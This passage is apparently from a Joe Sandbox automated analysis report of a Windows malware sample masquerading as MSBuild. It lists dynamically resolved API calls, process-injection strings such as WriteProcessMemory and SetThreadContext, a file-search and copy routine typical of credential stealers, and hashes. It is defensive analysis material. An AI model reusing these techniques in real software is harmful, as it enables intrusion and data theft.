                                                                                        • GetProcAddress.KERNEL32(75290000,016963D0), ref: 0041800C
                                                                                        • GetProcAddress.KERNEL32(734C0000,01690D48), ref: 0041802C
                                                                                        • GetProcAddress.KERNEL32(734C0000,016963F0), ref: 00418044
                                                                                        • GetProcAddress.KERNEL32(734C0000,01690E10), ref: 0041805C
                                                                                        • GetProcAddress.KERNEL32(734C0000,01699860), ref: 00418075
                                                                                        • GetProcAddress.KERNEL32(734C0000,016998C0), ref: 0041808D
                                                                                        • GetProcAddress.KERNEL32(734C0000,01696410), ref: 004180A5
                                                                                        • GetProcAddress.KERNEL32(734C0000,01696430), ref: 004180BE
                                                                                        • GetProcAddress.KERNEL32(734C0000,01699848), ref: 004180D6
                                                                                        • GetProcAddress.KERNEL32(752C0000,01696470), ref: 004180F2
                                                                                        • GetProcAddress.KERNEL32(752C0000,016964D0), ref: 0041810A
                                                                                        • GetProcAddress.KERNEL32(752C0000,01699800), ref: 00418122
                                                                                        • GetProcAddress.KERNEL32(752C0000,01699890), ref: 0041813B
                                                                                        • GetProcAddress.KERNEL32(752C0000,01699E48), ref: 00418153
                                                                                        • GetProcAddress.KERNEL32(74EC0000,01690FF0), ref: 00418173
                                                                                        • GetProcAddress.KERNEL32(74EC0000,01690CD0), ref: 0041818B
                                                                                        • GetProcAddress.KERNEL32(74EC0000,016998A8), ref: 004181A3
                                                                                        • GetProcAddress.KERNEL32(74EC0000,01699DA8), ref: 004181BC
                                                                                        • GetProcAddress.KERNEL32(74EC0000,01699F48), ref: 004181D4
                                                                                        • GetProcAddress.KERNEL32(74EC0000,01690DE8), ref: 004181EC
                                                                                        • GetProcAddress.KERNEL32(75BD0000,016996F8), ref: 0041820C
                                                                                        • GetProcAddress.KERNEL32(75BD0000,01699D68), ref: 00418224
                                                                                        • GetProcAddress.KERNEL32(75BD0000,0168EF38), ref: 0041823D
                                                                                        • GetProcAddress.KERNEL32(75BD0000,01699560), ref: 00418255
                                                                                        • GetProcAddress.KERNEL32(75BD0000,016997B8), ref: 0041826D
                                                                                        • GetProcAddress.KERNEL32(75BD0000,01699D88), ref: 00418286
                                                                                        • GetProcAddress.KERNEL32(75BD0000,01699DC8), ref: 0041829E
                                                                                        • GetProcAddress.KERNEL32(75BD0000,016997D0), ref: 004182B6
                                                                                        • GetProcAddress.KERNEL32(75BD0000,01699548), ref: 004182CF
                                                                                        • GetProcAddress.KERNEL32(75A70000,01699DE8), ref: 004182EB
                                                                                        • GetProcAddress.KERNEL32(75A70000,01699590), ref: 00418303
                                                                                        • GetProcAddress.KERNEL32(75A70000,01699650), ref: 0041831C
                                                                                        • GetProcAddress.KERNEL32(75A70000,016995A8), ref: 00418334
                                                                                        • GetProcAddress.KERNEL32(75A70000,01699518), ref: 0041834C
                                                                                        • GetProcAddress.KERNEL32(75450000,01699E08), ref: 00418368
                                                                                        • GetProcAddress.KERNEL32(75450000,0169A0A8), ref: 00418380
                                                                                        • GetProcAddress.KERNEL32(75DA0000,01699EC8), ref: 0041839C
                                                                                        • GetProcAddress.KERNEL32(75DA0000,016997A0), ref: 004183B4
                                                                                        • GetProcAddress.KERNEL32(6F090000,01699E28), ref: 004183D4
                                                                                        • GetProcAddress.KERNEL32(6F090000,0169A028), ref: 004183EC
                                                                                        • GetProcAddress.KERNEL32(6F090000,0169A008), ref: 00418405
                                                                                        • GetProcAddress.KERNEL32(6F090000,016995D8), ref: 0041841D
                                                                                        • GetProcAddress.KERNEL32(6F090000,01699E68), ref: 00418435
                                                                                        • GetProcAddress.KERNEL32(6F090000,01699E88), ref: 0041844E
                                                                                        • GetProcAddress.KERNEL32(6F090000,01699F28), ref: 00418466
                                                                                        • GetProcAddress.KERNEL32(6F090000,01699D08), ref: 0041847E
                                                                                        • GetProcAddress.KERNEL32(6F090000,HttpQueryInfoA), ref: 00418495
                                                                                        • GetProcAddress.KERNEL32(6F090000,InternetSetOptionA), ref: 004184AC
                                                                                        • GetProcAddress.KERNEL32(75AF0000,01699578), ref: 004184C8
                                                                                        • GetProcAddress.KERNEL32(75AF0000,0168EF48), ref: 004184E0
                                                                                        • GetProcAddress.KERNEL32(75AF0000,016997E8), ref: 004184F9
                                                                                        • GetProcAddress.KERNEL32(75AF0000,01699500), ref: 00418511
                                                                                        • GetProcAddress.KERNEL32(75D90000,01699F08), ref: 0041852D
                                                                                        • GetProcAddress.KERNEL32(6F9E0000,01699788), ref: 00418549
                                                                                        • GetProcAddress.KERNEL32(6F9E0000,01699EA8), ref: 00418561
                                                                                        • GetProcAddress.KERNEL32(6F9E0000,016995C0), ref: 0041857A
                                                                                        • GetProcAddress.KERNEL32(6F9E0000,016995F0), ref: 00418592
                                                                                        • GetProcAddress.KERNEL32(6CF50000,SymMatchString), ref: 004185AC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                        • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                        • API String ID: 2238633743-2740034357
                                                                                        • Opcode ID: 99bfb0a2137326516713e216a9d450e559a5b5e2ebbfb807218a3a1d6a70ef3d
                                                                                        • Instruction ID: 063c43ef11668f3b4bcf1e06991fb7fc39d12d8cee9b34c79393d9f3b317e2b6
                                                                                        • Opcode Fuzzy Hash: 99bfb0a2137326516713e216a9d450e559a5b5e2ebbfb807218a3a1d6a70ef3d
                                                                                        • Instruction Fuzzy Hash: 5A6211B9A106009FD714DFA5EE8A9263BFBF7C87013147519EA06C3364E7B8A841CF95
                                                                                        Function 00402000 Relevance: 70.1, APIs: 39, Strings: 1, Instructions: 124stringmemoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402014
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040201B
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402022
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402029
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402030
                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040203B
                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402042
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402052
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402059
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402060
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402067
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040206E
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402079
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402080
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402087
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040208E
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402095
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020AB
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020B2
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020B9
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020C0
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020C7
                                                                                        • lstrlenA.KERNEL32(?,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020CF
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020F0
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020F7
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020FE
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402105
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040210C
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040211C
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402123
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040212A
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402131
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402138
                                                                                        • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 0040214D
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 00402158
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 0040215F
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 00402166
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 0040216D
                                                                                        • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 00402174
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$Heap$AllocateProcessProtectVirtual
                                                                                        • String ID: In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention
                                                                                        • API String ID: 2533436356-3600131318
                                                                                        • Opcode ID: a4167687b35c2fc6c3f12c85d54bc1d37fc4993539ebfefbbc702df93726a96d
                                                                                        • Instruction ID: 155b361810c2162a8ce7a193311da36ac5826eab53bfc95ccb16ddaea6ec9530
                                                                                        • Opcode Fuzzy Hash: a4167687b35c2fc6c3f12c85d54bc1d37fc4993539ebfefbbc702df93726a96d
                                                                                        • Instruction Fuzzy Hash: C131BA21F8033CF79660EBED6C4AF5E6EF5FF8CB50BA0425779085558289A85401CEAF
                                                                                        Function 00414F80 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 325stringfileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1260 414f80-414fee call 41c800 wsprintfA FindFirstFileA memset * 2 1263 414ff4-415000 1260->1263 1264 41538c-4153b2 call 40f890 * 4 1260->1264 1265 415003-415017 StrCmpCA 1263->1265 1267 415369-41537c FindNextFileA 1265->1267 1268 41501d-415031 StrCmpCA 1265->1268 1267->1265 1270 415382-415386 FindClose 1267->1270 1268->1267 1271 415037-415068 wsprintfA StrCmpCA 1268->1271 1270->1264 1273 415093-4150b0 wsprintfA 1271->1273 1274 41506a-415091 wsprintfA 1271->1274 1276 4150b3-4150f1 memset lstrcatA strtok_s 1273->1276 1274->1276 1278 4150f3-415105 1276->1278 1279 415122-415160 memset lstrcatA strtok_s 1276->1279 1282 415306-41530e 1278->1282 1290 41510b-415120 strtok_s 1278->1290 1279->1282 1283 415166-415176 PathMatchSpecA 1279->1283 1282->1267 1285 415310-41531e 1282->1285 1287 415267-41527c strtok_s 1283->1287 1288 41517c-41524e call 40f810 call 410b80 call 40f9a0 call 40f940 call 40f9a0 call 40f940 call 40f8f0 call 40f890 * 5 call 40fa50 DeleteFileA call 40fa50 CopyFileA call 40fa50 call 410f90 call 41c880 1283->1288 1285->1270 1289 415320-415328 1285->1289 1287->1283 1292 415282 1287->1292 1331 415250-415262 call 40fa50 DeleteFileA call 40f890 1288->1331 1332 415287-415298 1288->1332 1289->1267 1293 41532a-41535e call 401080 call 414f80 1289->1293 1290->1278 1290->1279 1292->1282 1301 415363 1293->1301 1301->1267 1331->1287 1333 4153b3-4153bb call 40f890 1332->1333 1334 41529e-4152be call 40f850 call 406c20 1332->1334 1333->1264 1344 4152c0-4152f9 call 40f810 call 401080 call 4142a0 call 40f890 1334->1344 1345 4152fe-415301 call 40f890 1334->1345 1344->1345 1345->1282
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 00414FA0
                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414FB7
                                                                                        • memset.MSVCRT ref: 00414FD0
                                                                                        • memset.MSVCRT ref: 00414FE3
                                                                                        • StrCmpCA.SHLWAPI(?,004201DC), ref: 0041500F
                                                                                        • StrCmpCA.SHLWAPI(?,004201D8), ref: 00415029
                                                                                        • wsprintfA.USER32 ref: 0041504E
                                                                                        • StrCmpCA.SHLWAPI(?,004201E9), ref: 00415060
                                                                                        • wsprintfA.USER32 ref: 00415088
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • wsprintfA.USER32 ref: 004150AA
                                                                                        • memset.MSVCRT ref: 004150C1
                                                                                        • lstrcatA.KERNEL32(?,?), ref: 004150D1
                                                                                        • strtok_s.MSVCRT ref: 004150E7
                                                                                        • strtok_s.MSVCRT ref: 00415116
                                                                                        • memset.MSVCRT ref: 00415130
                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415140
                                                                                        • strtok_s.MSVCRT ref: 00415156
                                                                                        • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0041516E
                                                                                        • DeleteFileA.KERNEL32(00000000,00000000,?,016996B0,?,?,?,004201E0,?,00000000,?,004201E9), ref: 0041520F
                                                                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00415227
                                                                                          • Part of subcall function 00410F90: CreateFileA.KERNEL32(;RA,80000000,00000003,00000000,00000003,00000080,00000000,?,0041523B,00000000,?,004201E9), ref: 00410FAD
                                                                                          • Part of subcall function 00410F90: GetFileSizeEx.KERNEL32(00000000,?,?,004201E9), ref: 00410FBF
                                                                                          • Part of subcall function 00410F90: CloseHandle.KERNEL32(00000000,?,004201E9), ref: 00410FCA
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00415247
                                                                                        • DeleteFileA.KERNEL32(00000000,00000000,?,000003E8,00000000,?,?,004201E9), ref: 00415259
                                                                                        • strtok_s.MSVCRT ref: 00415272
                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 00415374
                                                                                        • FindClose.KERNEL32(?), ref: 00415386
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$memsetstrtok_swsprintf$Find$CloseDeletelstrcat$CopyCreateFirstHandleMatchNextPathSizeSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrcpy
                                                                                        • String ID: %s\%s$%s\%s\%s$%s\*.*
                                                                                        • API String ID: 3252185717-1853381274
                                                                                        • Opcode ID: 0aeac19fcec0b14e9ead343c32786da9af42c10a528b2d87a31145e6b81b9723
                                                                                        • Instruction ID: 996867c3883e5c4f9d14c97c6daec3073e0067922b1a953186596bd2cd2b31e7
                                                                                        • Opcode Fuzzy Hash: 0aeac19fcec0b14e9ead343c32786da9af42c10a528b2d87a31145e6b81b9723
                                                                                        • Instruction Fuzzy Hash: 21C19B72900208ABDB24EBB1DC45FEE737CAF44704F54456EF915A6181EF78AB48CBA4
                                                                                        Function 004176E0 Relevance: 48.2, APIs: 32, Instructions: 222libraryloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1354 4176e0-41770b GetPEB 1355 417711-41791d call 406ac0 GetProcAddress * 20 1354->1355 1356 417922-417981 LoadLibraryA * 5 1354->1356 1355->1356 1358 417983-417991 GetProcAddress 1356->1358 1359 417996-41799d 1356->1359 1358->1359 1360 4179ca-4179d1 1359->1360 1361 41799f-4179c5 GetProcAddress * 2 1359->1361 1363 4179d3-4179e1 GetProcAddress 1360->1363 1364 4179e6-4179ed 1360->1364 1361->1360 1363->1364 1365 417a02-417a09 1364->1365 1366 4179ef-4179fd GetProcAddress 1364->1366 1368 417a36-417a39 1365->1368 1369 417a0b-417a31 GetProcAddress * 2 1365->1369 1366->1365 1369->1368
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168AA20), ref: 00417748
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168AB10), ref: 00417761
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168AB28), ref: 00417779
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168A930), ref: 00417791
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168EE38), ref: 004177AA
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01696630), ref: 004177C2
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01696610), ref: 004177DA
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168A978), ref: 004177F3
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168AAC8), ref: 0041780B
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168AA50), ref: 00417823
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168AA68), ref: 0041783C
                                                                                        • GetProcAddress.KERNEL32(74DD0000,016964F0), ref: 00417854
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168A9A8), ref: 0041786C
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168A9C0), ref: 00417885
                                                                                        • GetProcAddress.KERNEL32(74DD0000,016965B0), ref: 0041789D
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168AA80), ref: 004178B5
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168AAF8), ref: 004178CE
                                                                                        • GetProcAddress.KERNEL32(74DD0000,016965D0), ref: 004178E6
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168AB58), ref: 004178FE
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01696510), ref: 00417917
                                                                                        • LoadLibraryA.KERNEL32(0168AAE0), ref: 00417928
                                                                                        • LoadLibraryA.KERNEL32(0168A888), ref: 0041793A
                                                                                        • LoadLibraryA.KERNEL32(0168AB88), ref: 0041794C
                                                                                        • LoadLibraryA.KERNEL32(0168ABA0), ref: 0041795D
                                                                                        • LoadLibraryA.KERNEL32(0168ABB8), ref: 0041796F
                                                                                        • GetProcAddress.KERNEL32(75A70000,0168ABD0), ref: 0041798B
                                                                                        • GetProcAddress.KERNEL32(75290000,0168ABE8), ref: 004179A7
                                                                                        • GetProcAddress.KERNEL32(75290000,0168AC00), ref: 004179BF
                                                                                        • GetProcAddress.KERNEL32(75BD0000,0168AC18), ref: 004179DB
                                                                                        • GetProcAddress.KERNEL32(75450000,01696390), ref: 004179F7
                                                                                        • GetProcAddress.KERNEL32(76E90000,0168EF18), ref: 00417A13
                                                                                        • GetProcAddress.KERNEL32(76E90000,01690D70), ref: 00417A2B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 2238633743-0
                                                                                        • Opcode ID: b04e20b63fdf4f387884290b9549695a90ee90dedd28098ad983ad3a78714f51
                                                                                        • Instruction ID: 2148604ec22d5dc409469944cda03c78a345716d380cb9a295fa5105f019d802
                                                                                        • Opcode Fuzzy Hash: b04e20b63fdf4f387884290b9549695a90ee90dedd28098ad983ad3a78714f51
                                                                                        • Instruction Fuzzy Hash: 7CA162B5A116009FD714DFA5EE899263BFBF7C8701308751AEA06C3364E7B8A805CF95
                                                                                        Function 0040C2E0 Relevance: 44.5, APIs: 20, Strings: 5, Instructions: 767fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
